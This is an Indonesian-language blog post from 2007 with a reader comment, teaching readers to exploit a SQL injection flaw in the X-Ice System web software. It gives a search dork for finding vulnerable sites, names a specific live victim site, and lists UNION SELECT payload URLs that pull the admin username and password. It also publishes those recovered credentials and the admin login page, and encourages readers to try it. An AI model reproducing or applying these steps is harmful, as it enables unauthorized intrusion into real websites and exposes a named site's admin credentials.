SQL Injection pada X-Ice System V-1

Posted By: Al-k

SQL Injection pada X-Ice System V-1

18-03-2007 | 18:45:46 | Halaman Ini dibaca 16656 kali

Hallo, bertemu kembali dengan saya, di tutorial yang kesekian kalinya, kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah… 🙂
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
🙂

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat …
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers hata ‘80040e14’

[Microsoft][ODBC Microsoft Access Sürücüsü] ‘id=’ sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8

Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya
:

-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

Shoutz to : B_scorpio ==> Salute sama perjuangannya menguasai dunia …. huehuehuehue bcanda

Advertisements

1 Comment »

  1. Rahad TheKill said

    keren tutorialnya………..
    lagi blogwalking nih sob……
    kunjngan baliknya ditunggu 😀
    sekedar saran yah : iklan yg ada di pojok kanan sebaiknya di ilangin aja, soalnya aku dah prnah pnya blog yg isi iklannya lngsung ke banned.
    cuma saran loh 😀

RSS feed for comments on this post · TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: